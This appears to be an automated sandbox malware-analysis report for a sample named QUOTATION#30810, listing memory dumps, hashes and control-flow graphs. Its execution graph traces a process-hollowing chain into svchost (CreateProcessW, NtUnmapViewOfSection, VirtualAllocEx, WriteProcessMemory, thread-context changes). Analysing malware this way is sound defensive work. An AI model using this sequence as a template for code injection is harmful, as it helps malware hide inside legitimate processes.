                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f37b6aa64d27fc03021a32c3f7fa1502fe25d6f4573eb0ff53dedaef048bf18c
                                                                                                                                                                                      • Instruction ID: f4bd4984fc8e235badf11b96a264d6ebcaa91cb4a9734b815cbe66e2d0db5ff3
                                                                                                                                                                                      • Opcode Fuzzy Hash: f37b6aa64d27fc03021a32c3f7fa1502fe25d6f4573eb0ff53dedaef048bf18c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 57415B7260D6890FD71E9E388C661B57BAAEB83220B1582BFD4C7C75D7DD24680783D1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 33c2bcf57efa913914c612dd039fd992094fb7efd2ceea9f1165a4fce7497aab
                                                                                                                                                                                      • Instruction ID: 50030adf639066769151649d631da884e34672a39d54b4dc50cc48cdfb863afe
                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c2bcf57efa913914c612dd039fd992094fb7efd2ceea9f1165a4fce7497aab
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D414861A0D6891FD31E9E38C8611A17BAAEB87310B1582BFD4CBC71D7DD24A80783E1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 396 7ffb4b07026b-7ffb4b07026d 397 7ffb4b0703b1-7ffb4b0703b7 396->397 398 7ffb4b07026e-7ffb4b07027c 396->398 401 7ffb4b0703b9-7ffb4b0703c8 397->401 400 7ffb4b070284-7ffb4b070286 398->400 402 7ffb4b0702f7-7ffb4b070306 400->402 403 7ffb4b070288-7ffb4b070289 400->403 405 7ffb4b0703c9-7ffb4b070427 401->405 404 7ffb4b070307-7ffb4b070309 402->404 406 7ffb4b07024f-7ffb4b070255 403->406 407 7ffb4b07028b 403->407 404->397 408 7ffb4b07030a-7ffb4b070348 404->408 415 7ffb4b07045c-7ffb4b070474 405->415 416 7ffb4b070429-7ffb4b070440 405->416 407->404 410 7ffb4b07028d 407->410 408->401 433 7ffb4b07034a-7ffb4b07034d 408->433 411 7ffb4b07028f-7ffb4b0702a0 410->411 412 7ffb4b0702d4 410->412 419 7ffb4b0702a2-7ffb4b0702b8 411->419 420 7ffb4b070233-7ffb4b07024e 411->420 412->397 417 7ffb4b0702da-7ffb4b0702f5 412->417 421 7ffb4b0704b1-7ffb4b0704d0 416->421 422 7ffb4b070442-7ffb4b07045a 416->422 417->402 419->397 425 7ffb4b0702be-7ffb4b0702d1 419->425 420->406 426 7ffb4b0704d1-7ffb4b070500 421->426 422->415 422->426 425->412 438 7ffb4b070571-7ffb4b070590 426->438 439 7ffb4b070502-7ffb4b070534 426->439 433->405 434 7ffb4b07034f 433->434 436 7ffb4b070351-7ffb4b07035f 434->436 437 7ffb4b070396-7ffb4b0703b0 434->437 436->437 442 7ffb4b070592-7ffb4b070595 438->442 443 7ffb4b070597-7ffb4b0705a7 438->443 442->443 447 7ffb4b0705dc-7ffb4b0705f4 443->447 448 7ffb4b0705a9-7ffb4b0705c0 443->448 450 7ffb4b070631-7ffb4b07067a 448->450 451 7ffb4b0705c2-7ffb4b0705da 448->451 458 7ffb4b0706eb-7ffb4b0706f9 450->458 459 7ffb4b07067c-7ffb4b07067e 450->459 451->447 461 7ffb4b0706fa-7ffb4b07073c 458->461 460 7ffb4b070680-7ffb4b0706c7 459->460 459->461 467 7ffb4b07073e-7ffb4b070772 461->467 468 7ffb4b070786-7ffb4b07078b 461->468 470 7ffb4b070a42-7ffb4b070a56 467->470 471 7ffb4b070778-7ffb4b070781 467->471 468->470 472 7ffb4b07078c-7ffb4b07079e 468->472 479 7ffb4b070a57-7ffb4b070ab7 470->479 474 7ffb4b070783-7ffb4b070785 471->474 475 7ffb4b07079f-7ffb4b0707bd 472->475 474->468 475->470 478 7ffb4b0707c3-7ffb4b0707d6 475->478 485 7ffb4b070847-7ffb4b070856 478->485 486 7ffb4b0707d8-7ffb4b0707d9 478->486 483 7ffb4b070aec-7ffb4b070b04 479->483 484 7ffb4b070ab9-7ffb4b070ad0 479->484 487 7ffb4b070b41-7ffb4b070b77 483->487 484->487 488 7ffb4b070ad2-7ffb4b070aeb 484->488 490 7ffb4b070857-7ffb4b070859 485->490 486->475 491 7ffb4b0707db 486->491 502 7ffb4b070bac-7ffb4b070bc4 487->502 503 7ffb4b070b79-7ffb4b070b90 487->503 488->483 490->470 495 7ffb4b07085a-7ffb4b070872 490->495 491->490 492 7ffb4b0707dd 491->492 496 7ffb4b0707df-7ffb4b0707f0 492->496 497 7ffb4b070824 492->497 510 7ffb4b0708e3-7ffb4b0708f0 495->510 511 7ffb4b070874-7ffb4b070877 495->511 496->474 505 7ffb4b0707f2-7ffb4b070808 496->505 497->470 501 7ffb4b07082a-7ffb4b070845 497->501 501->485 507 7ffb4b070c01-7ffb4b070c50 503->507 508 7ffb4b070b92-7ffb4b070bab 503->508 505->470 513 7ffb4b07080e-7ffb4b070821 505->513 529 7ffb4b070cc1-7ffb4b070cfe 507->529 530 7ffb4b070c52-7ffb4b070c84 507->530 508->502 517 7ffb4b0708f3 510->517 516 7ffb4b070879 511->516 511->517 513->497 521 7ffb4b0708c0 516->521 522 7ffb4b07087b-7ffb4b0708a2 516->522 517->470 519 7ffb4b0708f9-7ffb4b07090c 517->519 534 7ffb4b07097d-7ffb4b070990 519->534 535 7ffb4b07090e-7ffb4b070912 519->535 524 7ffb4b0708c2 521->524 525 7ffb4b0708c3-7ffb4b0708e1 521->525 522->470 527 7ffb4b0708a8-7ffb4b0708be 522->527 524->525 525->510 527->470 527->521 536 7ffb4b070993 534->536 535->536 538 7ffb4b070914 535->538 536->470 540 7ffb4b070999-7ffb4b0709b5 536->540 542 7ffb4b070974-7ffb4b07097b 538->542 546 7ffb4b0709d2-7ffb4b0709e6 540->546 547 7ffb4b0709b7-7ffb4b0709cc 540->547 542->534 546->479 548 7ffb4b0709e8-7ffb4b0709ed 546->548 547->546 548->542 550 7ffb4b0709ef 548->550 550->470
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601894330.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4b070000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                      • API String ID: 0-3554254475
                                                                                                                                                                                      • Opcode ID: abb45a7af3b7917042521a261a589cb3386b9955d66942920249e589c82c266b
                                                                                                                                                                                      • Instruction ID: a58bc454a201461592a488f214a622afd45d95b9a3b727948228cc1972b94fa2
                                                                                                                                                                                      • Opcode Fuzzy Hash: abb45a7af3b7917042521a261a589cb3386b9955d66942920249e589c82c266b
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC6229B280D7864FE756EF78C8555A4BBE0FF55301F1886FED1C9CB2A2E9246806C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 897 7ffb4af9303a-7ffb4af93047 898 7ffb4af93049-7ffb4af93051 897->898 899 7ffb4af93052-7ffb4af93063 897->899 898->899 900 7ffb4af93065-7ffb4af9306d 899->900 901 7ffb4af9306e-7ffb4af9311f VirtualProtect 899->901 900->901 905 7ffb4af93127-7ffb4af9314f 901->905 906 7ffb4af93121 901->906 906->905
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                      • Opcode ID: 87b274199a1505e3625440df3bc2f2615b9c4544feebbadbb6008a51c49715d9
                                                                                                                                                                                      • Instruction ID: 75bae4b9eb70d1aad5838978d855e595edf3a26aa72ec7593b645d173f43d636
                                                                                                                                                                                      • Opcode Fuzzy Hash: 87b274199a1505e3625440df3bc2f2615b9c4544feebbadbb6008a51c49715d9
                                                                                                                                                                                      • Instruction Fuzzy Hash: C141243090CB888FDB19DFA898466E9BFF4EF56321F0402AFD049C31A3CB646856C791
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 907 7ffb4af9090d-7ffb4af9099c FreeConsole 911 7ffb4af909a4-7ffb4af909c0 907->911 912 7ffb4af9099e 907->912 912->911
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleFree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 771614528-0
                                                                                                                                                                                      • Opcode ID: 9ccbb2fb87fddee9c6f85963ea1ccad969eecf2e7e3fccde954eb6d7046e213e
                                                                                                                                                                                      • Instruction ID: 12b2c9df1aa45bb61b6b858e17861fb2409515955619ec32d88671fa67b1cb0f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ccbb2fb87fddee9c6f85963ea1ccad969eecf2e7e3fccde954eb6d7046e213e
                                                                                                                                                                                      • Instruction Fuzzy Hash: D0219F7190CB4C8FEB68DF58D88AAEABBF0EB59310F00416ED049C3252DB71A805CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d9f16f74de385adccb91a220499abc07f9288f1901a35ba9ea593a32c73a2564
                                                                                                                                                                                      • Instruction ID: 5ef5729d2675d9092f923774e56a0c64ae9a1ac835b47dd8e277d89d63356938
                                                                                                                                                                                      • Opcode Fuzzy Hash: d9f16f74de385adccb91a220499abc07f9288f1901a35ba9ea593a32c73a2564
                                                                                                                                                                                      • Instruction Fuzzy Hash: C96220B191CA468FE769AF24C5406F57BE1EF95310F2441FDD48ECB6D3EA28A846C780
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:13.6%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                      Signature Coverage:40%
                                                                                                                                                                                      Total number of Nodes:50
                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                      execution_graph 9749 7ffb4af9edf5 9750 7ffb4af9ee03 Wow64SetThreadContext 9749->9750 9752 7ffb4af9ee9a 9750->9752 9807 7ffb4af9e175 9808 7ffb4af9e183 CreateProcessW 9807->9808 9810 7ffb4af9e2f2 9808->9810 9753 7ffb4af9cb08 9754 7ffb4af9cb11 9753->9754 9757 7ffb4af9c9a8 9754->9757 9756 7ffb4af9cd6f 9758 7ffb4af9c9ad 9757->9758 9759 7ffb4af9cb54 VirtualAllocEx 9758->9759 9760 7ffb4af9cadb NtUnmapViewOfSection 9758->9760 9765 7ffb4af9cb18 9758->9765 9764 7ffb4af9e7e6 9759->9764 9762 7ffb4af9e48a 9760->9762 9762->9756 9764->9756 9765->9756 9774 7ffb4af9cb68 9775 7ffb4af9cb6d 9774->9775 9776 7ffb4af9c9a8 2 API calls 9775->9776 9777 7ffb4af9cd6f 9776->9777 9766 7ffb4af8090d 9767 7ffb4af8091f FreeConsole 9766->9767 9769 7ffb4af8099e 9767->9769 9783 7ffb4af9ca47 9788 7ffb4af9ca4b 9783->9788 9784 7ffb4af9cacc 9785 7ffb4af9cadb NtUnmapViewOfSection 9784->9785 9789 7ffb4af9cb54 VirtualAllocEx 9784->9789 9787 7ffb4af9e48a 9785->9787 9788->9784 9792 7ffb4af9cb18 9788->9792 9791 7ffb4af9e7e6 9789->9791 9793 7ffb4af9c9a8 2 API calls 9792->9793 9794 7ffb4af9cd6f 9793->9794 9770 7ffb4af9e3da 9771 7ffb4af9e3e7 NtUnmapViewOfSection 9770->9771 9773 7ffb4af9e48a 9771->9773 9737 7ffb4af9e1b9 9738 7ffb4af9e1c5 CreateProcessW 9737->9738 9740 7ffb4af9e2f2 9738->9740 9741 7ffb4af8303a 9742 7ffb4af83049 VirtualProtect 9741->9742 9744 7ffb4af83121 9742->9744 9745 7ffb4af9e92d 9746 7ffb4af9e94f WriteProcessMemory 9745->9746 9748 7ffb4af9ea01 9746->9748 9778 7ffb4af9e5dd 9779 7ffb4af9e60b 9778->9779 9780 7ffb4af9e796 VirtualAllocEx 9779->9780 9781 7ffb4af9e6f9 9779->9781 9782 7ffb4af9e7e6 9780->9782

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 0 7ffb4af9c9a8-7ffb4af9c9d9 6 7ffb4af9ca55-7ffb4af9ca62 0->6 7 7ffb4af9c9db-7ffb4af9ca22 0->7 8 7ffb4af9ca64-7ffb4af9ca6e 6->8 9 7ffb4af9cab0-7ffb4af9cac9 6->9 13 7ffb4af9ca70-7ffb4af9caaf 7->13 26 7ffb4af9ca24-7ffb4af9ca41 7->26 8->13 21 7ffb4af9cb18-7ffb4af9cd7d call 7ffb4af9c9a8 9->21 22 7ffb4af9cacc-7ffb4af9cad9 9->22 13->9 65 7ffb4af9cdd6-7ffb4af9cdeb 21->65 66 7ffb4af9cdf0 21->66 27 7ffb4af9cb54-7ffb4af9e7e4 VirtualAllocEx 22->27 28 7ffb4af9cadb-7ffb4af9e488 NtUnmapViewOfSection 22->28 26->6 54 7ffb4af9e7e6 27->54 55 7ffb4af9e7ec-7ffb4af9e809 27->55 47 7ffb4af9e48a 28->47 48 7ffb4af9e490-7ffb4af9e4ac 28->48 47->48 54->55 65->66 68 7ffb4af9ce1e-7ffb4af9ceb8 65->68 66->65 66->68 74 7ffb4af9cfe8-7ffb4af9cffa 68->74 75 7ffb4af9cebe-7ffb4af9cee3 68->75 79 7ffb4af9d1ba-7ffb4af9d1d7 74->79 80 7ffb4af9d000-7ffb4af9d016 74->80 75->74 82 7ffb4af9cee9-7ffb4af9cefd 75->82 80->79 88 7ffb4af9d01c-7ffb4af9d030 80->88 82->74 87 7ffb4af9d1d8-7ffb4af9d290 82->87 94 7ffb4af9d29c-7ffb4af9d2d3 87->94 88->79 96 7ffb4af9d4c4-7ffb4af9d4d9 94->96 97 7ffb4af9d2d9-7ffb4af9d405 94->97 102 7ffb4af9d4e3-7ffb4af9d4ef 96->102 103 7ffb4af9d4db-7ffb4af9d4e2 96->103 97->96 104 7ffb4af9d40b-7ffb4af9d426 97->104 103->102 104->96 106 7ffb4af9d42c-7ffb4af9d43f 104->106 106->96 107 7ffb4af9d445-7ffb4af9d456 106->107 107->96 109 7ffb4af9d458-7ffb4af9d467 107->109 110 7ffb4af9d469-7ffb4af9d474 109->110 111 7ffb4af9d4b2-7ffb4af9d4c3 109->111 110->111 113 7ffb4af9d476-7ffb4af9d4ad call 7ffb4af9a3e0 110->113 113->111
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: }L_
                                                                                                                                                                                      • API String ID: 0-2082537435
                                                                                                                                                                                      • Opcode ID: 13d4df4d87aa4943fb8a662da18d5b949639600d8f0ab6c05008c4a8954302c8
                                                                                                                                                                                      • Instruction ID: 602b712462ebe9c8b99caa560ee49c295c8b525a7c95e4c4096a0321dcb34b93
                                                                                                                                                                                      • Opcode Fuzzy Hash: 13d4df4d87aa4943fb8a662da18d5b949639600d8f0ab6c05008c4a8954302c8
                                                                                                                                                                                      • Instruction Fuzzy Hash: D1B137F290C6558FE715FF6CE8961F97BA8EF52321F1442BBD089C3193E924640787A1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 327 7ffb4af8bee1-7ffb4af8bf1b 329 7ffb4af8bfac-7ffb4af8bfbf 327->329 330 7ffb4af8bf21-7ffb4af8bf66 call 7ffb4af8afc0 327->330 334 7ffb4af8c001-7ffb4af8c004 329->334 335 7ffb4af8bfc1-7ffb4af8bfd9 329->335 330->329 342 7ffb4af8bf68-7ffb4af8bf86 330->342 337 7ffb4af8c005-7ffb4af8c021 334->337 338 7ffb4af8c0a6-7ffb4af8c0b7 334->338 340 7ffb4af8c023-7ffb4af8c03a 335->340 341 7ffb4af8bfdb-7ffb4af8bfff 335->341 337->340 346 7ffb4af8c0f9-7ffb4af8c106 338->346 347 7ffb4af8c0b9-7ffb4af8c0c7 338->347 340->338 356 7ffb4af8c03c-7ffb4af8c04e 340->356 341->334 342->329 344 7ffb4af8bf88-7ffb4af8bfab 342->344 349 7ffb4af8c1a3-7ffb4af8c1b1 346->349 350 7ffb4af8c107-7ffb4af8c111 346->350 348 7ffb4af8c0ca 347->348 352 7ffb4af8c0cb-7ffb4af8c0d9 348->352 362 7ffb4af8c1b3-7ffb4af8c1b5 349->362 363 7ffb4af8c1b6-7ffb4af8c1d4 349->363 353 7ffb4af8c113-7ffb4af8c114 350->353 354 7ffb4af8c117-7ffb4af8c121 350->354 355 7ffb4af8c123-7ffb4af8c145 call 7ffb4af8afc0 352->355 361 7ffb4af8c0db-7ffb4af8c0de 352->361 353->354 354->355 355->349 369 7ffb4af8c147-7ffb4af8c159 355->369 356->348 366 7ffb4af8c050 356->366 367 7ffb4af8c0e2-7ffb4af8c0f8 361->367 362->363 368 7ffb4af8c1d5-7ffb4af8c1d9 363->368 370 7ffb4af8c096-7ffb4af8c0a5 366->370 371 7ffb4af8c052-7ffb4af8c05a 366->371 367->346 372 7ffb4af8c223-7ffb4af8c263 call 7ffb4af8afc0 * 2 368->372 373 7ffb4af8c1db-7ffb4af8c206 368->373 369->368 379 7ffb4af8c15b 369->379 371->352 375 7ffb4af8c05c-7ffb4af8c061 371->375 376 7ffb4af8c2fc-7ffb4af8c30f 372->376 401 7ffb4af8c269-7ffb4af8c28b 372->401 373->376 377 7ffb4af8c20c-7ffb4af8c220 373->377 375->367 380 7ffb4af8c063-7ffb4af8c084 375->380 387 7ffb4af8c351 376->387 388 7ffb4af8c311-7ffb4af8c326 376->388 377->372 382 7ffb4af8c15d-7ffb4af8c17b 379->382 383 7ffb4af8c1a1-7ffb4af8c1a2 379->383 380->338 389 7ffb4af8c086-7ffb4af8c094 380->389 382->349 394 7ffb4af8c17d-7ffb4af8c1a0 382->394 393 7ffb4af8c352-7ffb4af8c359 387->393 395 7ffb4af8c328-7ffb4af8c33e 388->395 396 7ffb4af8c35b-7ffb4af8c35e 388->396 389->370 393->396 394->383 395->393 398 7ffb4af8c340-7ffb4af8c350 395->398 399 7ffb4af8c360-7ffb4af8c370 396->399 400 7ffb4af8c372-7ffb4af8c37e 396->400 402 7ffb4af8c38e-7ffb4af8c397 398->402 399->402 400->402 403 7ffb4af8c380-7ffb4af8c38b 400->403 401->376 405 7ffb4af8c408-7ffb4af8c415 402->405 406 7ffb4af8c399-7ffb4af8c39b 402->406 403->402 407 7ffb4af8c417-7ffb4af8c42a 405->407 406->407 408 7ffb4af8c39d 406->408 409 7ffb4af8c431-7ffb4af8c463 call 7ffb4af8afc0 407->409 410 7ffb4af8c42c call 7ffb4af8afc0 407->410 411 7ffb4af8c3e3-7ffb4af8c407 408->411 412 7ffb4af8c39f-7ffb4af8c3b7 408->412 413 7ffb4af8c569-7ffb4af8c588 409->413 423 7ffb4af8c469-7ffb4af8c489 409->423 410->409 411->413 414 7ffb4af8c40d-7ffb4af8c42c call 7ffb4af8afc0 411->414 412->411 424 7ffb4af8c58a-7ffb4af8c59a 413->424 425 7ffb4af8c551-7ffb4af8c568 413->425 414->409 428 7ffb4af8c50a-7ffb4af8c51b 423->428 429 7ffb4af8c48b-7ffb4af8c4ab 423->429 430 7ffb4af8c5e4-7ffb4af8c626 call 7ffb4af8afc0 * 2 424->430 431 7ffb4af8c59c-7ffb4af8c5c7 424->431 435 7ffb4af8c51c-7ffb4af8c528 428->435 429->435 436 7ffb4af8c4ad-7ffb4af8c4b2 429->436 433 7ffb4af8c75e-7ffb4af8c7b3 430->433 455 7ffb4af8c62c-7ffb4af8c64a 430->455 432 7ffb4af8c5cd-7ffb4af8c5e3 431->432 431->433 432->430 450 7ffb4af8c886-7ffb4af8c891 433->450 451 7ffb4af8c7b9-7ffb4af8c80e call 7ffb4af8afc0 * 2 433->451 438 7ffb4af8c52f-7ffb4af8c530 435->438 439 7ffb4af8c52a call 7ffb4af8b990 435->439 440 7ffb4af8c533-7ffb4af8c53f 436->440 441 7ffb4af8c4b4-7ffb4af8c4e6 436->441 438->440 439->438 440->413 443 7ffb4af8c541-7ffb4af8c54d 440->443 441->413 449 7ffb4af8c4ec-7ffb4af8c52a call 7ffb4af8b990 441->449 443->425 449->438 462 7ffb4af8c893-7ffb4af8c895 450->462 463 7ffb4af8c896-7ffb4af8c8db 450->463 451->450 484 7ffb4af8c810-7ffb4af8c83b 451->484 455->433 457 7ffb4af8c650-7ffb4af8c66a 455->457 460 7ffb4af8c6c3 457->460 461 7ffb4af8c66c-7ffb4af8c66f 457->461 464 7ffb4af8c734 460->464 465 7ffb4af8c6c5-7ffb4af8c6ca 460->465 468 7ffb4af8c6f0-7ffb4af8c732 call 7ffb4af8b990 461->468 469 7ffb4af8c671-7ffb4af8c68a 461->469 462->463 472 7ffb4af8c965-7ffb4af8c977 463->472 473 7ffb4af8c8e1-7ffb4af8c921 call 7ffb4af8afc0 463->473 464->433 474 7ffb4af8c736-7ffb4af8c749 464->474 470 7ffb4af8c74b-7ffb4af8c75d 465->470 471 7ffb4af8c6cc-7ffb4af8c6eb 465->471 468->464 475 7ffb4af8c6a5-7ffb4af8c6b7 469->475 476 7ffb4af8c68c-7ffb4af8c6a3 469->476 471->468 489 7ffb4af8c9b9 472->489 490 7ffb4af8c979-7ffb4af8c9b7 472->490 473->472 497 7ffb4af8c923-7ffb4af8c937 473->497 474->470 480 7ffb4af8c6bb-7ffb4af8c6c1 475->480 476->480 480->460 487 7ffb4af8c87a-7ffb4af8c885 484->487 488 7ffb4af8c83d-7ffb4af8c84f 484->488 488->450 494 7ffb4af8c851-7ffb4af8c877 488->494 491 7ffb4af8ca16-7ffb4af8ca2e 489->491 492 7ffb4af8c9bb-7ffb4af8ca14 489->492 490->489 502 7ffb4af8cb29-7ffb4af8cb33 491->502 492->491 494->487 501 7ffb4af8c941-7ffb4af8c951 497->501 505 7ffb4af8c953-7ffb4af8c964 501->505 503 7ffb4af8ca33-7ffb4af8ca3e 502->503 504 7ffb4af8cb39-7ffb4af8cb3f 502->504 507 7ffb4af8ca44-7ffb4af8ca8d 503->507 508 7ffb4af8cb40-7ffb4af8cb4e 503->508 517 7ffb4af8caaa-7ffb4af8caac 507->517 518 7ffb4af8ca8f-7ffb4af8caa8 507->518 513 7ffb4af8cb4f-7ffb4af8cb51 508->513 514 7ffb4af8cb53 513->514 515 7ffb4af8cb54-7ffb4af8cb59 513->515 514->515 519 7ffb4af8caaf-7ffb4af8cabc 517->519 518->519 521 7ffb4af8cabe-7ffb4af8cada 519->521 522 7ffb4af8cb21-7ffb4af8cb26 519->522 521->513 525 7ffb4af8cadc-7ffb4af8cb1a 521->525 522->502 525->522
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: #uM
                                                                                                                                                                                      • API String ID: 0-1265715537
                                                                                                                                                                                      • Opcode ID: b5eaa33cf475bfaaa110174b7673dd2c052dbb5b5035c5e5a6784abafbe2b96a
                                                                                                                                                                                      • Instruction ID: 1af716a39e7c51c570fac12915691bd4663cc2fee6107b53d2fb273943f9908d
                                                                                                                                                                                      • Opcode Fuzzy Hash: b5eaa33cf475bfaaa110174b7673dd2c052dbb5b5035c5e5a6784abafbe2b96a
                                                                                                                                                                                      • Instruction Fuzzy Hash: DCA2247091CA4A8FEB59EF38C4944A5B7E1FF95301B2445FED08AC72D6EB38A846C740
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 527 7ffb4af8ee79-7ffb4af8eead 530 7ffb4af8eeb5-7ffb4af8eeee 527->530 532 7ffb4af8ef5f-7ffb4af8ef75 call 7ffb4af8afc0 530->532 533 7ffb4af8eef0-7ffb4af8eef5 530->533 543 7ffb4af8ef77-7ffb4af8ef8a 532->543 544 7ffb4af8ef8f-7ffb4af8ef9a 532->544 534 7ffb4af8ef76-7ffb4af8ef8a 533->534 535 7ffb4af8eef7-7ffb4af8ef11 533->535 537 7ffb4af8f028-7ffb4af8f02a 534->537 540 7ffb4af8f09b-7ffb4af8f0a0 537->540 541 7ffb4af8f02c-7ffb4af8f031 537->541 546 7ffb4af8f0b2 540->546 545 7ffb4af8f033-7ffb4af8f04f 541->545 541->546 543->537 547 7ffb4af8ef9c-7ffb4af8efaf 544->547 548 7ffb4af8efb1-7ffb4af8efbc 544->548 549 7ffb4af8f0b4-7ffb4af8f0b5 546->549 550 7ffb4af8f0b8-7ffb4af8f106 call 7ffb4af8afc0 * 2 546->550 547->537 552 7ffb4af8efbe-7ffb4af8efd0 548->552 553 7ffb4af8efd2-7ffb4af8eff1 548->553 549->550 564 7ffb4af8f289-7ffb4af8f2e3 550->564 565 7ffb4af8f10c-7ffb4af8f12a 550->565 552->537 553->537 558 7ffb4af8eff3-7ffb4af8f024 553->558 558->537 579 7ffb4af8f416-7ffb4af8f473 564->579 580 7ffb4af8f2e9-7ffb4af8f344 call 7ffb4af8afc0 * 2 564->580 565->564 566 7ffb4af8f130-7ffb4af8f14f 565->566 570 7ffb4af8f1d0-7ffb4af8f1da 566->570 571 7ffb4af8f151-7ffb4af8f170 566->571 575 7ffb4af8f1dc-7ffb4af8f1df 570->575 576 7ffb4af8f20e-7ffb4af8f25f call 7ffb4af8b990 570->576 573 7ffb4af8f1e1-7ffb4af8f1f6 571->573 574 7ffb4af8f172-7ffb4af8f177 571->574 578 7ffb4af8f1f8-7ffb4af8f209 573->578 574->578 581 7ffb4af8f179-7ffb4af8f1c8 574->581 575->576 576->564 585 7ffb4af8f261-7ffb4af8f288 576->585 578->576 583 7ffb4af8f20b-7ffb4af8f20c 578->583 593 